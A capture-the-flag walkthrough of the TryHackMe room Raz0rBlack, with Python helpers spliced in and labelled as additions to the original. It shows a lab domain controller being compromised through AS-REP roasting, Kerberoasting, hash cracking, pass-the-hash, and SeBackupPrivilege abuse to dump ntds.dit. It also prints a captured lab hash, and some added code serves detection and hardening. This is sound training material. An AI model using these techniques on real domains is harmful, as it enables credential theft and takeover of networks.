THM: Raz0rBlack

Hacktivities
Published in InfoSec Write-ups
11 min read, Apr 24, 2022

In this article, I step through the process of compromising a domain controller by enumerating rpcbind and NFS, abusing Kerberos (AS-REP roasting and Kerberoasting), enumerating SMB, and finally elevating my privileges on the domain controller by abusing the backup privileges held by a user in the Backup Operators group. This challenge is available on the TryHackMe platform and is titled “RAZ0RBLACK 2.1”, created by the user “Xyan1d3”.

Disclaimer

I like to add a brief disclaimer before a writeup to encourage people to attempt the room before reading this article, since there will obviously be spoilers in this writeup. I believe you will enjoy the challenge more if you attempt it yourself first and then come back to this writeup if you get stuck or need a hint. So without any further delay, let's get started!

Port Enumeration

I started enumerating the target machine by performing a quick scan with NMAP to identify any open ports.

nmap -T5 --open -sS -vvv --min-rate=300 --max-retries=3 -p- -oN all-ports-nmap-report -Pn 10.10.7.159

PORT      STATE SERVICE          REASON
53/tcp open domain syn-ack ttl 125
88/tcp open kerberos-sec syn-ack ttl 125
111/tcp open rpcbind syn-ack ttl 125
135/tcp open msrpc syn-ack ttl 125
139/tcp open netbios-ssn syn-ack ttl 125
445/tcp open microsoft-ds syn-ack ttl 125
593/tcp open http-rpc-epmap syn-ack ttl 125
636/tcp open ldapssl syn-ack ttl 125
2049/tcp open nfs syn-ack ttl 125
3268/tcp open globalcatLDAP syn-ack ttl 125
3269/tcp open globalcatLDAPssl syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125
5985/tcp open wsman syn-ack ttl 125
9389/tcp open adws syn-ack ttl 125
47001/tcp open winrm syn-ack ttl 125
49664/tcp open unknown syn-ack ttl 125
49665/tcp open unknown syn-ack ttl 125
49666/tcp open unknown syn-ack ttl 125
49669/tcp open unknown syn-ack ttl 125
49672/tcp open unknown syn-ack ttl 125
49675/tcp open unknown syn-ack ttl 125
49676/tcp open unknown syn-ack ttl 125
49679/tcp open unknown syn-ack ttl 125
49694/tcp open unknown syn-ack ttl 125
49708/tcp open unknown syn-ack ttl 125
49846/tcp open unknown syn-ack ttl 125

Reviewing the output, I can see that there are twenty-six ports open. I next used NMAP to identify the service and version running on each port (-sV) and ran the default NSE scripts (-sC) to find any common misconfigurations or vulnerabilities that I could exploit.

nmap -sV -sC -Pn -v -oN nmap-report 10.10.7.159 -p 53,111,135,139,445,593,636,2049,3268,3269,3389,5985,9389,47001,49664,49665,49666,49669,49672,49675,49676,49679,49694,49708,49846

I can see a lot of output from NMAP and some interesting services that I can further enumerate.

Rpcbind & NFS Enumeration

There was a lot of information collected by NMAP when it scanned port 111, which was running the rpcbind service. rpcbind (the portmapper) maps RPC program numbers to the port each RPC service is listening on, so a client queries it first to learn where to connect for the service it wants.

111/tcp   open  rpcbind       2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs <---- Interesting
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status

I can see that NMAP identified the NFS service, which may allow me to list and download (and possibly upload) files if an export is mountable without authentication. I can also see that NMAP found port 2049 with NFS (and mountd) running on it.

2049/tcp  open  mountd        1-3 (RPC #100005)

NFS is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory. I can check whether any export is available for mounting using the showmount tool.

$ sudo showmount -e 10.10.7.159
[sudo] password for kali:
Export list for 10.10.7.159:
/users (everyone)

The “/users” export is mountable by everyone. I created a new directory under the tmp folder and ran the following commands to mount the /users export on this newly created directory.

mkdir /tmp/infosec
mount -t nfs 10.10.63.208:/users /tmp/infosec

Next, I checked that the directory was mounted successfully.

$ df -k

10.10.7.159:/users  20407296  16603136   3804160  82% /tmp/infosec

I navigated to “/tmp/infosec” directory and listed the contents. I can see that there are two files.

$ sudo ls -la /tmp/infosec

-rwx------ 1 nobody 4294967294 9861 Feb 25 2021 employee_status.xlsx
-rwx------ 1 nobody 4294967294 80 Feb 25 2021 sbradley.txt

I copied both files to my current working directory and retrieved the first flag for the user Steven, which was stored in “sbradley.txt”.

Steven’s Flag.

Next, I opened the “employee_status.xlsx” file.

“employee_status.xlsx” file contents.

I can see a list of players and their role within the haven secret hacker’s club. The user “ljudmila vetrova” is particularly interesting, since they are the Active Directory Admin.

Kerberos Enumeration

Kerberos is the primary authentication protocol within Active Directory and the KDC listens on port 88. We can use the tool kerbrute to enumerate users: it quickly identifies valid Active Directory accounts because the KDC answers a Kerberos pre-authentication request differently for a username that exists and one that does not. To use kerbrute, we need to specify the domain name and provide a list of users. Earlier, NMAP had identified the domain name as “raz0rblack.thm”, based on information returned by the RDP service on port 3389.

3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: RAZ0RBLACK
| NetBIOS_Domain_Name: RAZ0RBLACK
| NetBIOS_Computer_Name: HAVEN-DC
| DNS_Domain_Name: raz0rblack.thm
| DNS_Computer_Name: HAVEN-DC.raz0rblack.thm

We can also utilize the list of names discovered earlier in the “employee_status.xlsx” file to enumerate users. Based on the naming convention used for “sbradley.txt” and for the challenge questions, it appears the first initial of the users first name is concatenated with their surname. I used this naming convention when creating my user list based on the list of names in the “employee_status.xlsx” file.
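As an added illustration (my own code, not part of the original writeup), here is a small Python helper that applies the first-initial-plus-surname convention to a list of names and writes the one-name-per-line list that kerbrute's userenum expects. The sample names are constructed for the example, and the function assumes the surname is the last whitespace-separated token of the full name.

```python
import re
import unicodedata
from typing import Iterable, List, Optional

# Constructed sample names in the style of the employee_status.xlsx list
# (the spreadsheet itself is not reproduced here).
SAMPLE_NAMES = [
    "Ljudmila Vetrova",
    "Tyson Williams",
    "Steven Bradley",
    "Jean-Luc O'Neil",   # constructed, to show hyphen/apostrophe handling
]


def to_username(full_name: str) -> str:
    """First initial + surname, lowercased and ASCII-only.

    Follows the convention seen in sbradley.txt: Steven Bradley -> sbradley.
    Accents are folded to ASCII and anything that is not a letter or digit is
    dropped, so that the result is a plausible sAMAccountName.
    """
    parts = full_name.split()
    if len(parts) < 2:
        raise ValueError(f"need at least a first and last name: {full_name!r}")
    raw = parts[0][0] + parts[-1]
    ascii_form = unicodedata.normalize("NFKD", raw).encode("ascii", "ignore").decode()
    return re.sub(r"[^a-z0-9]", "", ascii_form.lower())


def build_userlist(names: Iterable[str], domain: Optional[str] = None) -> List[str]:
    """Deduplicated usernames in input order, optionally as user@domain."""
    seen = set()
    out: List[str] = []
    for name in names:
        user = to_username(name)
        if domain:
            user = f"{user}@{domain}"
        if user not in seen:
            seen.add(user)
            out.append(user)
    return out


if __name__ == "__main__":
    # One name per line is the format kerbrute's userenum reads.
    print("\n".join(build_userlist(SAMPLE_NAMES)))
```

Redirect the output to a file and pass it to kerbrute as the userlist. Folding accents matters for names like the one in the spreadsheet, since a sAMAccountName is normally plain ASCII even when the display name is not.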

./kerbrute_linux_amd64 userenum --dc 10.10.253.179 -d raz0rblack.thm -o kerbrute-user-enum userlist

2022/04/09 20:40:42 > [+] VALID USERNAME: lvetrova@raz0rblack.thm
2022/04/09 20:40:42 > [+] VALID USERNAME: twilliams@raz0rblack.thm
2022/04/09 20:40:42 > [+] VALID USERNAME: sbradley@raz0rblack.thm

ASREPRoasting

Now that I have some usernames, I decided to perform AS-REP roasting. This is possible when a user account has the account option “Do not require Kerberos preauthentication” set. It means that the KDC will hand out an AS-REP for that account without the requester first proving knowledge of the password, and part of that AS-REP is encrypted with a key derived from the user's password, so it can be cracked offline. Using the Impacket tool “GetNPUsers.py”, we can check each of the users enumerated with kerbrute earlier.

sudo python3 GetNPUsers.py raz0rblack.thm/ -dc-ip 10.10.160.198 -usersfile kerberos-usernames -no-pass -request -outputfile kerberos-users-found

Looking at the output file, I can see that we obtained an AS-REP hash for the user “twilliams@raz0rblack.thm”.

$krb5asrep$23$twilliams@raz0rblack.thm@RAZ0RBLACK.THM:50792603765164974bfbcf6b50a79f03$515241628dc6711dd499f6e5c23493b674b4b641c55df1b773fcccc0322ec68b45fa32e84c5f9b6d1097fac39097e6302f7835af51c6c05ac1b5fa392737eb021ea564c392916745a29ac4f7b37f735970ce9bb904c74ebb530086dc93e9b7b8b494e33393430deac61523ebae352a820d64d081fd112219e66331e4cb9ca45f5bba18276606c307b541ee7196d57c224e0f6a491fb0e1327dc2fc63ee62b56e0244a93ef6de3d56ee346fb439674d08ea745d8f927225daf809979329dd0b217d7633f47bcd864b82c135c1f1203b7290f14ad4fec88dce9c49b8e2afa381e5568e7a39fde062ff9d659270015fa9ca

Next, I can use hashcat to crack the “Kerberos 5 AS-REP etype 23” hash retrieved from the KDC.

hashcat64.exe -m 18200 -a 0 hash.txt rockyou.txt 
Cracked Hash.

SMB Enumeration

I can see that ports 139 and 445 are open. Port 139 carries SMB over NetBIOS and port 445 carries SMB directly over TCP; both are used for authentication and file sharing. There are multiple tools available to enumerate port 139/445. I started by using smbmap.

smbmap -H 10.10.160.198 -u twilliams -p roastpotatoes

Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
trash NO ACCESS Files Pending for deletion

I can see that the IPC$ share is Read Only, which means I can bind to it for RPC calls such as RID cycling to enumerate usernames.

crackmapexec smb 10.10.160.198 -u twilliams -p <....> --rid-brute

500: RAZ0RBLACK\Administrator (SidTypeUser)
501: RAZ0RBLACK\Guest (SidTypeUser)
502: RAZ0RBLACK\krbtgt (SidTypeUser)
1000: RAZ0RBLACK\HAVEN-DC$ (SidTypeUser)
1106: RAZ0RBLACK\xyan1d3 (SidTypeUser)
1107: RAZ0RBLACK\lvetrova (SidTypeUser)
1108: RAZ0RBLACK\sbradley (SidTypeUser)
1109: RAZ0RBLACK\twilliams (SidTypeUser)

I can see an interesting SMB share called “trash”, but I do not currently have access to it with the credentials for user “twilliams”. I decided to check for password reuse using crackmapexec and the list of users enumerated via the IPC$ share.

crackmapexec smb 10.10.169.150 -u userlist -p <....>

[-] raz0rblack.thm\Administrator:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\guest:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\krbtgt:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\HAVEN-DC$:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\ljudmila:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\lvetrova:<pass> STATUS_LOGON_FAILURE
[-] raz0rblack.thm\sbradley:<pass> STATUS_PASSWORD_MUST_CHANGE

It appears that the user “sbradley” has the same password but must change it before logging on (STATUS_PASSWORD_MUST_CHANGE). We can do that ourselves with the smbpasswd tool, supplying the old password (the one used with crackmapexec above) and choosing a new one.

smbpasswd -r 10.10.169.150 -U sbradley

Old SMB password:
New SMB password:
Retype new SMB password:
Password changed for user sbradley

I can now use the newly reset credentials for the user “sbradley” to further enumerate the SMB shares.

smbmap -H 10.10.127.15 -u sbradley -p password

Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
trash READ ONLY Files Pending for deletion

I see that I now have READ-ONLY access to the SMB share called trash. Looking at the contents of the share, I can see three files.

smbclient //10.10.127.15/trash -U sbradley 

smb: \> ls

chat_log_20210222143423.txt A 1340 Thu Feb 25 19:29:05 2021
experiment_gone_wrong.zip A 18927164 Tue Mar 16 06:02:20 2021
sbradley.txt A 37 Sat Feb 27 19:24:21 2021

Looking at the “chat_log_20210222143423.txt” file, I can see CVE-2020-1472 (i.e. ZeroLogon) is mentioned. The user “sbradley” also appears to have made an encrypted zip containing the ntds.dit and SYSTEM hive files before the administrator revoked their WinRM access. I used fcrackzip with the “rockyou.txt” wordlist to find the password for the encrypted ZIP file.

fcrackzip -u -D -p ~/rockyou.txt experiment_gone_wrong.zip

PASSWORD FOUND!!!!: pw == electro......

I extracted the ntds.dit and the SYSTEM.hive files, then I used “secretsdump.py” to extract the password hashes.

sudo python3 secretsdump.py -system system.hive -ntds ntds.dit LOCAL

This presents me with a long list of hashes in the format domain\user:rid:lmhash:nthash:::. I extracted the NT hashes (the fourth colon-separated field) from the output of “secretsdump.py” using the cut command.

cat hashes | cut -d ':' -f 4
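An added example, not from the original writeup: a Python parser for secretsdump's NTDS lines that does what the cut command above does, but only over lines that really are NTLM records (the Kerberos key lines and status messages are skipped), and then runs the checks a defender would want on such a dump: blank passwords, legacy LM hashes still stored, and one NT hash shared by several accounts, which is the password reuse this writeup tests for by hand. The sample output and every hash in it are constructed; no hashes from the room are reproduced.

```python
import re
from collections import defaultdict
from typing import Dict, List, Tuple

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"   # LM hash of the empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"   # NT hash of the empty string

# domain\user:rid:lmhash:nthash:::  (the domain prefix is optional in secretsdump output)
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$",
    re.IGNORECASE,
)

# Constructed sample output; all hashes are dummies, not values from the room.
SAMPLE_OUTPUT = r"""
[*] Target system bootKey: 0x0000000000000000000000000000dummy
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1a1:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HAVEN-DC$:1000:aad3b435b51404eeaad3b435b51404ee:c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3c3:::
raz0rblack.thm\lvetrova:1107:aad3b435b51404eeaad3b435b51404ee:b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2:::
raz0rblack.thm\sbradley:1108:0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f0f:b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2b2:::
[*] Kerberos keys from ntds.dit
raz0rblack.thm\lvetrova:aes256-cts-hmac-sha1-96:d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4d4
[*] Cleaning up...
"""


def parse_secretsdump(text: str) -> List[Dict[str, object]]:
    """Return one dict per NTLM record; every other line is ignored."""
    rows: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            d: Dict[str, object] = m.groupdict()
            d["rid"] = int(m.group("rid"))
            d["lm"] = m.group("lm").lower()
            d["nt"] = m.group("nt").lower()
            rows.append(d)
    return rows


def nt_hashes(rows: List[Dict[str, object]]) -> List[str]:
    """Same result as `cut -d ':' -f 4`, restricted to real NTLM records."""
    return [str(r["nt"]) for r in rows]


def audit(rows: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Findings a domain admin should act on before an attacker finds them."""
    findings: List[Tuple[str, str]] = []
    by_nt: Dict[str, List[str]] = defaultdict(list)
    for r in rows:
        user = str(r["user"])
        if r["nt"] == EMPTY_NT:
            findings.append(("blank-password", user))
        if r["lm"] != EMPTY_LM:
            findings.append(("lm-hash-stored", user))
        if not user.endswith("$"):          # computer accounts have random passwords
            by_nt[str(r["nt"])].append(user)
    for users in by_nt.values():
        if len(users) > 1:                  # identical NT hash == identical password
            findings.append(("password-reuse", ",".join(sorted(users))))
    return findings


if __name__ == "__main__":
    parsed = parse_secretsdump(SAMPLE_OUTPUT)
    print("\n".join(nt_hashes(parsed)))
    for rule, who in audit(parsed):
        print(f"[{rule}] {who}")
```

Because NT hashes are unsalted, two accounts with the same password always carry the same hash, which is why the reuse check needs no cracking at all; it is also why the crackmapexec password-reuse check earlier in this writeup was worth trying.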

Next, I used crackmapexec to identify the hash for the user lvetrova.

crackmapexec smb 10.10.105.22 -u lvetrova -H userhashes

[+] raz0rblack.thm\lvetrova:f220d3988deb**************

Now that we have the user's NT hash, we can use evil-winrm to perform a pass-the-hash login over WinRM.

evil-winrm -u lvetrova -H f220d3988deb3f***** -i 10.10.105.22 -N

I started enumerating the target and found an XML file called “lvetrova.xml”.

*Evil-WinRM* PS C:\Users\lvetrova> dir

Directory: C:\Users\lvetrova

Mode                LastWriteTime         Length Name
---- ------------- ------ ----
d-r--- 9/15/2018 12:19 AM Desktop
d-r--- 2/25/2021 10:14 AM Documents
d-r--- 9/15/2018 12:19 AM Downloads
d-r--- 9/15/2018 12:19 AM Favorites
d-r--- 9/15/2018 12:19 AM Links
d-r--- 9/15/2018 12:19 AM Music
d-r--- 9/15/2018 12:19 AM Pictures
d----- 9/15/2018 12:19 AM Saved Games
d-r--- 9/15/2018 12:19 AM Videos
-a---- 2/25/2021 10:16 AM 1692 lvetrova.xml

I used the type command to show the contents of the file and I can see that it is a PSCredential object serialized to XML with PowerShell. A PSCredential object represents a set of security credentials, such as a user name and password.

PSCredential PowerShell xml file.

We can read the flag stored in the xml file using PowerShell, as seen below.

Ljudmila’s Flag.

Kerberoasting

Since we have a valid hash, I can look for accounts with an SPN set and request a TGS ticket for each of them using the “GetUserSPNs.py” tool from Impacket.

sudo python3 GetUserSPNs.py -dc-ip 10.10.32.193 raz0rblack.thm/lvetrova -hashes f220d3988deb3******:f220d3988deb3***** -request

This successfully provides a TGS hash for the user “xyan1d3” and I can now use hashcat to crack it and recover the password.

hashcat64.exe -m 13100 hash.txt rockyou.txt
Cracked hash.
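Both of the Kerberos attacks in this writeup leave a trace on the domain controller, so as an added defender-side example (my code, not part of the original post) here is the detection logic in Python, run over constructed sample events. It keys on the fields that Windows Security events 4768 (TGT requested) and 4769 (service ticket requested) carry: a TGT issued with PreAuthType 0 is AS-REP roasting material, and RC4 (etype 0x17) service tickets for accounts that are neither krbtgt nor computer accounts are Kerberoast candidates, especially several of them from one source in quick succession. The field names match the event schema; the event values, the service account names other than the one from the room, and the threshold of three are my own assumptions.

```python
from collections import defaultdict
from typing import Dict, List, Tuple

RC4_HMAC = "0x17"    # etype 23 (RC4-HMAC): what hashcat modes 18200 and 13100 attack
NO_PREAUTH = "0"     # PreAuthType 0: the TGT was issued without pre-authentication
SPRAY_THRESHOLD = 3  # distinct RC4 service tickets from one source before we call it a spray

Event = Dict[str, object]
Finding = Tuple[str, str, str, str]   # (severity, rule, account, source ip)

# Constructed sample events using the field names of Security events 4768/4769.
# Addresses and the svc_* accounts are made up for the example.
SAMPLE_EVENTS: List[Event] = [
    {"EventID": 4768, "TargetUserName": "twilliams", "ServiceName": "krbtgt",
     "PreAuthType": "0", "TicketEncryptionType": "0x17", "Status": "0x0",
     "IpAddress": "10.10.1.50"},
    {"EventID": 4768, "TargetUserName": "lvetrova", "ServiceName": "krbtgt",
     "PreAuthType": "2", "TicketEncryptionType": "0x12", "Status": "0x0",
     "IpAddress": "10.10.1.20"},
    {"EventID": 4769, "TargetUserName": "lvetrova@RAZ0RBLACK.THM", "ServiceName": "xyan1d3",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.1.50"},
    {"EventID": 4769, "TargetUserName": "lvetrova@RAZ0RBLACK.THM", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.1.50"},
    {"EventID": 4769, "TargetUserName": "lvetrova@RAZ0RBLACK.THM", "ServiceName": "svc_web",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.1.50"},
    {"EventID": 4769, "TargetUserName": "lvetrova@RAZ0RBLACK.THM", "ServiceName": "HAVEN-DC$",
     "TicketEncryptionType": "0x12", "Status": "0x0", "IpAddress": "10.10.1.50"},
    {"EventID": 4769, "TargetUserName": "sbradley@RAZ0RBLACK.THM", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x17", "Status": "0x0", "IpAddress": "10.10.1.21"},
]


def is_asrep_roast(ev: Event) -> bool:
    """A successful TGT request that skipped pre-authentication."""
    return ev["EventID"] == 4768 and ev["Status"] == "0x0" and ev["PreAuthType"] == NO_PREAUTH


def is_kerberoast(ev: Event) -> bool:
    """A successful RC4 service ticket for a user (not computer, not krbtgt) SPN account."""
    svc = str(ev["ServiceName"])
    return (ev["EventID"] == 4769 and ev["Status"] == "0x0"
            and ev["TicketEncryptionType"] == RC4_HMAC
            and svc.lower() != "krbtgt" and not svc.endswith("$"))


def triage(events: List[Event]) -> List[Finding]:
    findings: List[Finding] = []
    rc4_tgs_by_source: Dict[str, set] = defaultdict(set)
    for ev in events:
        ip = str(ev["IpAddress"])
        if is_asrep_roast(ev):
            # RC4 makes the AS-REP cheap to crack; AES is still roastable, just slower.
            sev = "high" if ev["TicketEncryptionType"] == RC4_HMAC else "medium"
            findings.append((sev, "asrep-roast", str(ev["TargetUserName"]), ip))
        elif is_kerberoast(ev):
            findings.append(("high", "kerberoast", str(ev["ServiceName"]), ip))
            rc4_tgs_by_source[ip].add(str(ev["ServiceName"]))
    for ip, services in rc4_tgs_by_source.items():
        if len(services) >= SPRAY_THRESHOLD:
            findings.append(("high", "kerberoast-spray", ",".join(sorted(services)), ip))
    return findings


if __name__ == "__main__":
    for sev, rule, account, ip in triage(SAMPLE_EVENTS):
        print(f"{sev:<6} {rule:<17} {account:<24} from {ip}")
```

A single RC4 service ticket is noisy on its own, since a domain that never set msDS-SupportedEncryptionTypes on its service accounts issues RC4 by default; the strong signal is one source pulling tickets for many SPN accounts in a short window. The fixes are the usual ones: clear the “Do not require Kerberos preauthentication” flag, and give SPN accounts AES-only encryption types and long random passwords (or convert them to gMSAs).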

I next used the credentials with evil-winrm to login. Once logged in, I found another PSCredential PowerShell xml file, which contains the flag, despite stating otherwise.

Xyan1d3’s Flag.

Privilege Escalation

I started by performing some manual user enumeration using whoami.

whoami /all

Group Name                                 Type
========================================== ================
Everyone Well-known group
BUILTIN\Backup Operators Alias
BUILTIN\Remote Management Users Alias
BUILTIN\Users Alias
......
PRIVILEGES INFORMATION
----------------------
Privilege Name Description
============================= ==============================
SeMachineAccountPrivilege Add workstations to domain
SeBackupPrivilege Back up files and directories
SeRestorePrivilege Restore files and directories
SeShutdownPrivilege Shut down the system
SeChangeNotifyPrivilege Bypass traverse checking
SeIncreaseWorkingSetPrivilege Increase a process working set

Looking through the user's permissions with “whoami /all”, I saw the user is part of the Backup Operators group, which holds SeBackupPrivilege and SeRestorePrivilege. SeBackupPrivilege lets the holder read any file regardless of its ACL, which can be abused in several ways, for example with DiskShadow to expose a shadow copy of the system volume and then copy the locked ntds.dit from it. Below is the DiskShadow script used to get the files.

set metadata C:\tmp\tmp.cabs 
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% h:

I uploaded the text file and executed the following commands, as outlined by the linked article above.

*Evil-WinRM* PS C:\Users\xyan1d3\Documents> upload back_script.txt

*Evil-WinRM* PS C:\Users\xyan1d3\Documents> mkdir C:\tmp

*Evil-WinRM* PS C:\Users\xyan1d3\Documents> diskshadow /s back_script.txt

*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeUtils.dll

*Evil-WinRM* PS C:\tmp> upload SeBackupPrivilegeCmdLets.dll

*Evil-WinRM* PS C:\tmp> import-module .\SeBackupPrivilegeUtils.dll

*Evil-WinRM* PS C:\tmp> import-module .\SeBackupPrivilegeCmdLets.dll

*Evil-WinRM* PS C:\tmp> copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite

*Evil-WinRM* PS C:\temp> reg save hklm\system c:\temp\system

*Evil-WinRM* PS C:\temp> download ntds.dit

*Evil-WinRM* PS C:\temp> download system
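As an added example (my code, not from the original post), the following Python script parses “whoami /all” output into its sections by using the ruler lines of equals signs to recover the column boundaries, then flags the group memberships and privileges that make a token worth a second look, Backup Operators and SeBackupPrivilege/SeRestorePrivilege among them. The sample output is constructed to mirror the layout shown above (the user's SID is made up; the BUILTIN group SIDs are the real well-known ones), and the lists of risky groups and privileges are my own selection, not an exhaustive one.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample in the layout `whoami /all` prints. Column widths are the
# ones whoami would produce for these values; the user SID is made up.
SAMPLE_WHOAMI = r"""
USER INFORMATION
----------------

User Name          SID
================== ==============================================
raz0rblack\xyan1d3 S-1-5-21-1111111111-2222222222-3333333333-1106


GROUP INFORMATION
-----------------

Group Name                      Type             SID          Attributes
=============================== ================ ============ ==================================================
Everyone                        Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators        Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                   Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== ========
SeMachineAccountPrivilege     Add workstations to domain     Disabled
SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled
SeShutdownPrivilege           Shut down the system           Disabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
"""

# Well-known BUILTIN groups whose members can escalate to SYSTEM/DA on a DC.
HIGH_RISK_GROUP_SIDS = {
    "S-1-5-32-544": "Administrators",
    "S-1-5-32-548": "Account Operators",
    "S-1-5-32-549": "Server Operators",
    "S-1-5-32-550": "Print Operators",
    "S-1-5-32-551": "Backup Operators",
}
# Privileges that let a holder bypass ACLs or take over other processes.
HIGH_RISK_PRIVS = {
    "SeBackupPrivilege", "SeRestorePrivilege", "SeDebugPrivilege",
    "SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege",
    "SeTakeOwnershipPrivilege", "SeLoadDriverPrivilege", "SeTcbPrivilege",
}

Row = Dict[str, str]


def parse_whoami(text: str) -> Dict[str, List[Row]]:
    """Split `whoami /all` output into sections keyed 'user', 'group', 'privileges'."""
    lines = text.splitlines()
    sections: Dict[str, List[Row]] = {}
    i = 0
    while i < len(lines):
        is_title = (lines[i].endswith(" INFORMATION") and i + 1 < len(lines)
                    and lines[i + 1] and set(lines[i + 1]) == {"-"})
        if not is_title:
            i += 1
            continue
        name = lines[i].split()[0].lower()
        j = i + 2
        while j < len(lines) and not re.fullmatch(r"[= ]+", lines[j]):
            j += 1                       # find the '=' ruler; the header is just above it
        header = lines[j - 1]
        spans = [(m.start(), m.end()) for m in re.finditer(r"=+", lines[j])]
        last = len(spans) - 1
        cols = [header[s:e if k != last else None].strip() for k, (s, e) in enumerate(spans)]
        rows: List[Row] = []
        j += 1
        while j < len(lines) and lines[j].strip():
            rows.append({cols[k]: lines[j][s:e if k != last else None].strip()
                         for k, (s, e) in enumerate(spans)})
            j += 1
        sections[name] = rows
        i = j
    return sections


def triage(sections: Dict[str, List[Row]]) -> List[Tuple[str, str]]:
    findings: List[Tuple[str, str]] = []
    for g in sections.get("group", []):
        if g["SID"] in HIGH_RISK_GROUP_SIDS:
            findings.append(("group", g["Group Name"]))
    for p in sections.get("privileges", []):
        # 'Disabled' only means the privilege is not enabled in the current token;
        # the holder can enable it at will, so State is deliberately ignored here.
        if p["Privilege Name"] in HIGH_RISK_PRIVS:
            findings.append(("privilege", p["Privilege Name"]))
    return findings


if __name__ == "__main__":
    for kind, value in triage(parse_whoami(SAMPLE_WHOAMI)):
        print(f"{kind:<9} {value}")
```

The comment in triage is the caveat that trips people up when reading this output: SeBackupPrivilege showing as “Disabled” does not mean the account lacks it. From a hardening standpoint, membership of Backup Operators on a domain controller should be treated as equivalent to Domain Admins and kept empty or tightly audited.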

Once I had the ntds.dit file and the SYSTEM hive, I could use “secretsdump.py” to retrieve the hashes.

python3 secretsdump.py -system system -ntds ntds.dit LOCAL

This provided the hash for the administrator’s account. I can now use evil-winrm to login as the administrator. I can see the PSCredential PowerShell “root.xml” file with the flag but I get an error when attempting to read it.

PSCredential PowerShell Error.

Looking at the contents of the “root.xml”, I can see the encoded flag. Using CyberChef, I can see that the file’s flag is hex encoded and decoding it gives me the flag.

Root flag.

Tyson’s Flag

I started looking for Tyson’s Flag and found a user folder called “twilliams”. Inside the folder, I found a suspicious file:

definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_definitely_not_a_flag.exe

Checking the contents of this file gives me the flag.

Tysons Flag.

Top Secret

The final task for this room is to find the top secret hidden on the machine. Performing some manual enumeration, I identified a folder called “Top Secret” under “Program Files”.

Mode                LastWriteTime         Length Name
---- ------------- ------ ----
d----- 5/21/2021 11:45 AM Amazon
d----- 2/23/2021 6:27 AM Common Files
d----- 5/21/2021 9:39 AM internet explorer
d----- 2/25/2021 10:13 AM Top Secret
d----- 5/21/2021 11:41 AM VMware

I can see an image file stored in the folder called “top_secret.png”. I downloaded the image and opened it.

top_secret.png

Based on the image, it appears that the top secret is the full command used to exit VIM.

Final Thoughts

